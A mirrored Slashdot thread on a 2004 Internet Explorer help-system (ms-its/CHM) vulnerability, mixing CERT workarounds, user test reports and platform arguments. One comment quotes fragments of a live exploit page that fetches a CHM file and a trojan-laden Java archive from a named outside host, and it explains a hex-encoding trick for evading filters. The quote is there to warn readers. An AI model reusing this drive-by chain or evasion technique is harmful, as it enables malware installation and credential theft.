Slashdot Mirror
New Windows Vulnerability in Help System
wesleyt writes "CERT announced today a significant Microsoft Windows vulnerability related to IE and its handling of the Windows help subsystem. There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild. Because the vulnerability is in the help subsystem, even users who avoid Outlook and IE are vulnerable, since IE is the default handler for help files. It seems that this is going to be an ugly one."
Microsoft is in some serious need of some help on this...
I am sure the major virus scanners will have it before anything "really" bad happens.. this isnt anything special.. move along
"could allow an attacker to execute arbitrary code with the privileges of the user running IE" This is why you run as a restricted user rather than administrator or power user. Restricted users don't have write or modify permissions to the WINNT or Program Files directories or subdirectories. And they certainly don't have permission to screw with the registry.
Although there's no specific patch, the Windows XP SP2 release candidate mitigates this problem.
> and no virus definitions for the major scanners
Jesus, even my ScanJet is vulnerable?
Most of us here have already modified our systems knowing that having even the IE exe file or outlook express exe file could cause problems and have removed it (even in spite of the hidden little annoying backup). Remember to get rid of IE be sure to look in the folder /windows/system32/dllcache for those backup exe files that it uses to restore when you try and rip IE or outlook out yourself.
They announced this TODAY? It has been discussed on Bugtraq for weeks - and due to a few comments I made in their discussion forum the Swedish IDG.se reported this last Friday. I've also linked to one of the PoC-exploits here on Slashdot for people check for themselves. ... what took them so long?
Jelmer's PoC is good: link
(That page is the info page, you won't get hit by clicking on the link directly)
it's in my head
now would be a very good time to start the clocks to see how long it takes them to get a patch out. Should be a good case in point for the forrester research published last week. rd
I'm a man, therefore I use MAN pages when I need help. ;)
- A
IE's exe file is not very relevant, as it is only a loader for the DLLs that implement the actual functionality.
How else could it be so small?
To really get rid of IE you need to remove the DLL files that it uses, and you will break many other programs in the process. Because they all closely link to eachother.
I don't know about the rest of you, but things like these are actually scaring me out of running Windows. Apart from my powerbooks (no problems there) I have one PC laptop on which I run WinXP and Linux and I like to use Windows for its ACPI support, but I'm now constantly afraid that some as yet undescribed security hole will allow someone to screw up my computer/home network. Brrrr. No Windows any longer, I'm sick and tired of being afraid when using my computer.
----- One learns to itch where one can scratch.
Remember to backup your registry (or at least this portion of it)
a nd ler\{ms-its,ms-itss,its,mk}
From the CERT article:
Currently, there is no complete solution for this vulnerability. Until a patch is available, consider the workarounds listed below.
Disable ITS protocol handlers
Disabling ITS protocol handlers appears to prevent exploitation of this vulnerability. Delete or rename the following registry keys:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\H
Disabling these protocol handlers will significantly reduce the functionality of the Windows Help system and may have other unintended consequences. Plan to undo these changes after patches have been tested and installed.
Follow good Internet security practices
These recommended security practices will help to reduce exposure to attacks and mitigate the impact of cross-domain vulnerabilities.
Disable Active scripting and ActiveX controls
NOTE: Disabling Active scripting and ActiveX controls will not prevent the exploitation of this vulnerability.
Disabling Active scripting and ActiveX controls in the Internet and Local Machine Zones may stop certain types of attacks and will prevent exploitation of different cross-domain vulnerabilities. Disable Active scripting and ActiveX controls in any zones used to read HTML email.
Disabling Active scripting and ActiveX controls in the Local Machine Zone will prevent malicious code that requires Active scripting and ActiveX controls from running. Changing these settings may reduce the functionality of scripts, applets, Windows components, or other applications. See Microsoft Knowledge Base Article 833633 for detailed information about security settings for the Local Machine Zone. Note that Service Pack 2 for Windows XP includes these changes.
Do not follow unsolicited links
Do not click on unsolicited URLs received in email, instant messages, web forums, or Internet relay chat (IRC) channels.
Maintain updated anti-virus software
Anti-virus software with updated virus definitions may identify and prevent some exploit attempts. Variations of exploits or attack vectors may not be detected. Do not rely solely on anti-virus software to defend against this vulnerability. More information about viruses and anti-virus vendors is available on the US-CERT Computer Virus Resources page.
We had the release of a "conceptual" Trojan yesterday.... but not a real virus.
Some software company was trying to sell their mac virus software. A real ID3 tag Mac Trojan does not exist right now.... and odds are we will see patches before one comes to be.
"Things are more moderner than before- bigger, and yet smaller- it's computers-- San Dimas High School football RULES!"
The RUNAS service will allow you to run an executable with elevated privileges. And shortcuts have the option to run as a different user by clicking the check box that says,"Run as different user." To use the RUNAS service, just hold down shift and right-click and you'll see an option that says "Run As".
i checked the link from the poster above,and it did not seem to do anything on Mozilla 1.7B
There is a proof of concpet page here. Neither mozilla nor firefox are susceptible.
... that not publishing vulnerabilities doesn't stop exploits. This one had exploits long before the vulnerability was known to anyone but the hackers. I have to laugh every time MS whines about how problems would go away if vulnerabilities were never disclosed, except to the vendor of course. The only thing that might go away is the bad PR, if even that.
At the risk of replying to a Microsoft troll, this is not a "pretty insignificant" story.
Errors in server-side applications are rapidly fixed by serious system administrators and at the worst they provide attackers a way into unprotected systems. How many computers around the world are currently infected or zombied thanks to holes in any of the programs you cited? Almost zero.
Security holes in client-side applications (MSIE, Outlook, primarily) are a totally different story. These programs are mainly used by people who don't have the capacity to protect their systems. And the results are clear: millions of PCs infected by everything from viruses to worms and spywares, used as platforms to launch DDoS attacks, to send spam, to steal information...
There is a real security problem on the Internet, one that is making a joke of the "information highway", and it's almost entirely caused by vulnerabilities like the one reported here.
Until the market leader realizes that its users need serious protection from the malicious forces who roam the Internet, no amount of criticism is too much. And, if you really want to support and defend Microsoft, you should be adding your voice, because it is this issue - its failure to provide its users with a safe platform - which will be its downfall.
"Microsoft = insecure" is an association that should be sending shivers down the backs of those marketing managers trying to bomb the web with billions of Microsoft adverts.
Ceci n'est pas une signature
Are you sure?
i loaded up ie, went help... contents and index... search... and typed in"help subsystem vulnerable" and hit list topics
a pop up box announced "no topics found"
so what is everyone talking about? this doesn't seem to be a problem
intellectual property law is philosophically incoherent. it is your moral duty to ignore it or sabotage it
this is probably some kind of mean trick from mister Linus to discourage the use of Windows. I don't believe in this vulnera...
hey, where did my files go?
Save it as chm-disable.reg
Put a line like this in your logon script:
regedit
Use the same trick to restore the values when a patch is available (that means that you must save the HANDLER keys first).
Note: If you're still using batch files: KiXtart is your friend!
how to format my harddisk. Maybe Windows-help can provide me with some support. *clickety-click*
sig(h)
we haven't finished talking about the OS X security hole. Damn MS always has to get market dominance in everything they do...
The Mothership
I use a "custom level" for my internet zone. I basically turn off *everything*. I don't need java, and "active scripting" should be re-worded to say "give web pages access to God-knows-what?".
Besides, I really despise the "AppletTransition Sensor" that ESPN and other sites use. Screw `em. Just give me the dang HTML and, please, IE, just render it for me. No code, no scripts, no popups, no crap.
Websites that require JavaScript piss me off. The stupid Washington Post can't even render a page without JavaScript. What a terd.
Now, if only I could get IE to stop displaying the "Your browser doesn't allow ActiveX controls" message that pops up on pages where the designer used some crap control. I've made ActiveX controls and I *know* they can do anything they want on my system. Arg.
And wtf is with "install desktop items"? This is a *web* *browser*, not the control panel, for crying out loud.
And, last but not least, when I disable all this crap and then hit apply, it gives me a confirm warning message, but when I (because I need to use JavaScript on some crappy page) restore the default "cheap-whore-mode" settings, it doesn't say a word! Nice emphasis, Microsoft.
Yeah, I know, use a different browser (or OS), but we all know Windows is *designed* to not interoperate well with those things, right? Sometimes, it wastes time to try to fight inertia.
Anyhow, my feeling is that the desktop situation on Linux and BSD won't be solved until X is ditched completely. Just give me the dang screen buffer(s) and some basic routines and I'll draw my own shtuff. X is a 25-year-old terd, designed for machines with, like, 4k of memory (warning: hyperbole). Just give me font, line, point, ellipse, bitblt and friggin window data structures -- straight to the video card. And access to the video card reg's would be nice too.
End of Rant, enjoy your day.
Peace & Blessings,
bmac
Where's my friggin points when I need them?
Look, this is absolutely true. There is still plenty of software out there that breaks under W2K/WXP when not run as a local administrator.
And forget 'looser' environments. I run a network at a private school. Care to take a guess how much educational software cares about following the rules properly? Grrr!!!
"...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
...but Mr MS-Security himself said that there were NO exploits prior to the security patches !
Maybe we deserve this world ?
does anyone know where this exploit originated?
is it, perchance, related to the recent windows source code leak?
K.
That's it! I'm buying a Mac!
"The more I use Windows, the more I love my Commodore 64"
If telephones are outlawed, then only outlaws will have telephones.
That's not the point. MS has tried to lead the public to believe that there's never been an instince of exploit code before their patch. And obviously if there's exploit code out there, something already "really bad" has happened. This comes after the witty worm spread before ISS had patches for their products.
On a related note, MS pretty much NEVER releases advisory's on their own will before a patch. There almost always has to be a 3rd party that has said they are going to go public, or there have to be exploits or information in the wild. With that information, I wonder if this exploit is related to the windows source leak. The source leak had a lot of IE code, and if there are exploits in the wild before MS could even send out an advisory. That would lead me to the possiblity that the windows source leak could be the source of this one.
I played with fire and tested the PoC found here
In IE, it copied itself over wmplayer.exe, SFP copied the original back, but that was enough for me. Firefox 0.8, OTOH, didn't budge and nothing happened to wmplayer.exe. Same thing with Netscape 7.1 and Opera 7.23.
At least in this case, IE seems to be the only one.
Why did you make it so bloody difficult to switch off html content in recieved Email text? AT best, it meant bandwidth guzzling spam, at worst viruses you didnt even have to open to catch..
As to browser/plug-in vulnerabilities, it may never be possible to eliminate them all, there are just too many niches for a virus to gain foothold.
"You lied to me! There is a Swansea!"
There you are, all your user friendliness rubish, that Linux is ready for the desktop.
How would Joe Average, Jose Sixpack, Aunt Tillie, your Mom, my Mom, Granma, Grandpa, the children, would react if faced with such arcane, incomprehensible instructions.
In Windows everything is easy, In Windows everything is one click away.
You Linux zealots are the sux0r.
IANAL but write like a drunk one.
Are you happy now, or do we still need to educate you why modularity is a better design compromise?
Thanks to MS decision to embed IE into everything in WIndows makes Windows a breeding ground fro vulnerabilities.
IANAL but write like a drunk one.
I ran a few quick tests on a couple of different Windows XP systems using the proof of concept exploit code here.
s peed.planet.nl/security/newone/modified//EXPLOIT.C HM::/exploit.htm
.chm) in any directories except for the ProgramFilesDir and System directories, but, as you can see, it did not stop the sample code from executing when IE was run with administrator privileges.
---------
Windows XP Professional Service Pack 1
Mozilla Firebird 0.8 run as limited user: no apparent effect
Mozilla Firebird 0.8 run as administrator: no apparent effect
Internet Explorer 6 run as limited user causes an Internet Explorer Script Error:
Line 47, Char: 5, Error: Write to file failed, Code: 0
URL: ms-its:mhtml:file://C:\foo.mht!http://ip3e83566f.
Internet Explorer 6 run as administrator: demo exploit runs as expected
A software restriction policy is in place on this machine, forbidding the execution of any executable files (including
------------
Windows XP Professional Service Pack 2 RC 1
Internet Explorer 6 run as administrator: no apparent effect
Fixed in SP2?
---------------
One thing that concerns me about using this particular sample code as a test, is that it seems to rely on having write permission to \Program Files, thus requiring administrator privileges (usually) and thus making limited user accounts appear to be invuelnerable -- but are they? Can a version of this exploit be written that runs even if the user does not have write privileges to the program files and system directories? (Thus giving access to all of the limited user's files.) In such a case, would software restriction policies prevent the execution of the exploit exe even if not stopping the script itself?
Windows XP sets up its users with full administrator privileges by default and without a password.
The simple Control Panel even hides the management interface to make granular security possible.
The truth is, in order for NT to work in consumer homes, it had to behave just like DOS versions of Windows did.
Joe Sixpack may be computer illiterate, but his dollar is what ultimately fills Microsoft's coffers.
Up, Up, Down, Down, Left, Right, Left, Right, B, A, START
If this trend continues, their product names will soon be haiku.
I don't know about that specific vulnerability, but I always suspected something fishy about the chm files. They can run javascript and whatever else you compile into them with full user priviledge. Yes, I write chm files. I think a workaround is to disable Javascript and other scripting at the local intranet security level in IE options.
Non-Linux Penguins ?
Isn't that an oxymoron? I was reading an interview the other day that Gates has shifted the company's #1 priority from Longhorn to security. This is another major blow for Microsoft. But, since when has the help menu actually ever been useful anyway?
Considering how seldom the idiot^H^H^H^H^H^H users actually use the help function whre I work, it shouldn't be a problem. It seems they regard the IT Support "Help Desk" as their first place to look when they ought to be using the online Help function in that seemingly invisible menu at the right side of their window.
You see? You see? Your stupid minds! Stupid! Stupid!
But try explaining that to my dad, who cant figure out what program hes sending e-mail from.
All Troll + "offtopic" mods are meta moderated as "Unfair", because you abused the system.
Imagine teaching your mother to use one account for installs, and another for her email and browsing, then throw in some stuff that will only work under admin and you'll quickly see where this goes.
Somewhere in Linux-land, a phone rings....
Hello? Oh, hi mom. Yeah, I can help you install a program on your computer. What do you want to install? Oh, cool. Have you downloaded it? Good job. OK, open up a terminal.... it's a command line interface, where you type commands. Much more powerful than a GUI. Where did you save the file? You don't remember? Hmm. Just type "cd". Now type "ls". Do you see the file name? Great! OK, type "tar -zxf "
It didn't work? What does it say? OK. What is the name of the file you downloaded? Oh, well, that is a bzip file, not a tar and gzipped file. So type the same thing as before, but use "bzip2" instead of "tar".
What? Why didn't it work? Oh, it doesn't have the same syntax. Crap. Go to the man page. Oh, man stands for manual. Type "man bzip2". What does it say?
(20 minutes later)
OK, now we have uncompressed the files you need. No, not yet. Type "./configure" No, it's OK, it is figuring out what kind of computer and software you have.
OK, now type "make" OK, call me back when it is done.
(15 minutes later)
OK, now type "make install" What? Why not? What does it say? No, not that. Oh, wait, you have to be root. It is an administrator user.
Because not just everyone can install programs, for security reasons. Look, just change to the admin user by typing "su". OK, now enter the root password. I DON'T KNOW! You mean you don't know your root password?
(10 minutes later)
Mom, you should NOT use the dog's name as the password. Because it is insecure! Nevermind. Just type "make install". There. Now it is installed.
No, there is no icon, you have to type the name of program to run it. Type it. What? I don't know, what was the name of the binary after you compiled it? A binary file is a program you run. You compiled it when you typed "make". Hmm, let's look in the Makefile. Type "vi Makefile". What do you mean it is blank? Oh, wait. Use capital M. Type ":r Makefile" with a capital M.
OK, now you are in vi, the most powerful editor ever. WHAT DO YOU MEAN YOU PREFER EMACS!!!!
My beliefs do not require that you agree with them.
The code was for IE5, this is very unlikely. And a patch is available, its called shutting off the help sub-system. With Windows 2000 and XP it is a service, one which I never use, although I'm sure some people do.
Is that all you have to do? I just stopped and disabled the "Help and Support" service in WinXP Home. But then when I try "Help and Support" from the Start menu, that service switches itself to Automatic and starts again! Of course I won't be opening H&S any time soon.. but if "disabled" doesn't mean much, will it stop a virus? Or just start itself back up again?
You want a sig? I can get you a sig... Hell, I can get you a sig by 3 o'clock this afternoon... with nail polish.
You *may* be vulnerable if you have the network.protocol-handler.external.ms-help parameter in about:config set to true (at least on mozilla 1.7b). The default is false. I'm not able to test this out right now, can anyone verify this?
The other day my boss called me over to check out a suspicious looking email that had made it's way past SpamAssassin. It rendered blank, but looking at the raw message code revealed it was using just this kind of exploit (with a <FORM> to obfuscate what was really happening).
My boss' account has Restricted User privileges, with Eudora as the MUA and Mozilla as the browser, so no panic, but the fact that spammers are already using this is scary.
Explorer is already running (as your shell) and you can't convince it to restart itself as a different user. What you have to do is kill your existing explorer, (which kills everything including your desktop) then use the task manager to start it again using runas.
The new problem there is your WHOLE DESKTOP is now running as Administrator. Remember to kill it and restart it as yourself when you're done.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Linux is *not* user friendly, and until it is linux will stay with >1% marketshare.
I was hoping linux would keep its marketshare above 1% anyway.
Phone rings.
Hi mom. You want to install a program? Ok, what's it called?
Great! Now open a terminal window. It's a command line interface and it's much more powerful than a gui. Got it open? Great. Now you have to become the superuser, so type 'su' and then put in the password.
You don't know your root password? Ask dad.
Ok, great, so now you're root. Now type "urpmi", a space, and the name of the program you wish to install.
It's asking for the CD that contains the program. Put that CD in and follow the directions.
You're done, now? Great! Now just click on your K menu and you should find it under "Applications". You don't have a K menu? You have a little paw. Ok, click the little paw, yes I know it's cute. Found it? Glad to help!
Like what I said? You might like my music
Mozilla is not vulnerable.
There are two kinds of protocol handlers in Windows: system-wide and IE-specific. Mozilla supports the system-wide protocols but not the IE-specific protocols. ms-its is an IE-specific protocol.
We should probably take a second look at the system-wide protocols, though. Currently we blacklist some and let the rest through.
On the flip side...
How do you get [whatever] to work on Windows.
Step 1: Insert the cd and let autorun take over and do everything for you.
If that does not work or you run into problems during game play, follow this 20 step procedure (if one is even available) and hope you eventually get it to work, if you can not get it to work, too fucking bad.
As an owner of a few EA Games, I've been down that road many times.
Bad boys rape our young girls but Violet gives willingly.
Linux is *not* user friendly, and until it is linux will stay with >1% marketshare.
Take installation. Linux zealots are now saying "oh installing is so easy, just do apt-get install package or emerge package": Yes, because typing in "apt-get" or "emerge" makes so much more sense to new users than double-clicking an icon that says "setup".
I hate to break it to you, but anyone with the attitude you display is the problem, not a lack of user friendliness.
I have used linux since
I just did a fedora core 1 install. What a joke! Less questions, less knowledge required than a Windows install.
Even once you get it up and running it is smooth and easy to find what you want, vs. a standard kde install on another distro leaving you 40 choices for each type of functionality you'd like to use.
Here's the problem - any installation is somewhat of a barrier because most people do not install windows themselves - it comes on their computers. The steps being taken by Sun, Lindo(w)s, SuSe, Xandros, and others to get their distros defaulted on budget machines will get the familiarity and ease-of-use out there to the masses.
Linux zealots are far too forgiving when judging the difficultly of Linux configuration issues and far too harsh when judging the difficulty of Windows configuration issues. Example comments:
You're right. A friend is helping me bootstrap debian on a running machine I have nothing but net access to. Obviously a little tricky, but once you understand the basics, it's really reasonably easy. However, most Linux "power-users" would expect everyone to be able to do it.
Your examples with Quake show just why we need a common push for progress in this area, and the individual camps are making great strides, but there's needs to be a more unified effort to get better traction.
If Linux can't run a particular game out of the box, it doesn't hurt anyone. If Windows has a massive security hole, it costs businesses millions of dollars, clogs up the Internet with traffic, creates opportunities for spammers to make spam zombies, and exposes sensitive private data.
I just don't see how you can compare those two types of problems.
I found this page yesterday, it is an exploit of this vulnerability.
; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));t width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
/.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SERVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for ansering my question
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) than norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
"The crows seemed to be calling his name, thought Caw."
Name something that SP1 broke that either:
a) Affected you.
or
b) Hasn't been fixed via Hotfix already.
Not All Who Wander Are Lost
IE 6.0 and Firefox 0.8 do indeed open up a compose email window. Mozilla 1.6, OTOH, just sits there with a broken picture icon.
I'm not sure which is more interesting - that Firefox allows it such a boneheaded thing or that Firefox allows it when Mozilla does not. Aren't both using the same version of Gecko (I'm assuming that this is a function that Gecko would handle)?
To install the Linux version of Heretic II I had to click on some file called setup.sh and it installed. Sure I had to download a patch from www.lokigames.com, but you usually need to do that for Windows games anyway.
My point is that you are blaming Linux for a lousy installer. I have seen some lousy installs in Windows too.
Sure for a Linux Box you need the X Window System installed and setup correctly, but with Windows to run the latest games you need to install the latest video drivers to go with the latest DirectX 9.x you just installed (because Microsoft didn't get it right the firxt 8 times???) Most Windows game installers come bundled with the needed version of Direct X. Maybe linux installers should check that the needed components are installed an configured correctly.
Quake 3 is kind of an extreme example of how dificult too many developers make their installs.
Anonymous Coward wrote,[Q]
So, I guess the point I'm trying to make is that what seems easy and natural to Linux geeks is definitely not what regular people consider easy and natural. Hence, the preference towards Windows.
[/Q]
Double clicking on an icon isn't natural either. For those who have never seen a new computer user learn to use a mouse it goes something like this.
By the way, have you ever tried to setup Windows XP to browse smb shares on a local network when someone has coutomized it so there is not Nework Neighborhood (or whatever it is now called) on the desktop? Windows does it's fare share of stupid things too.
"Now go to My Computer."
*click*
"You need to double click it."
*click* *long pause* *click*
"You need to double click faster than that."
*click* *slightly shorter pause* *click*
Solitaire is a great training tool for those who don't catch on quickly.
Losing faith in humanity one person at a time.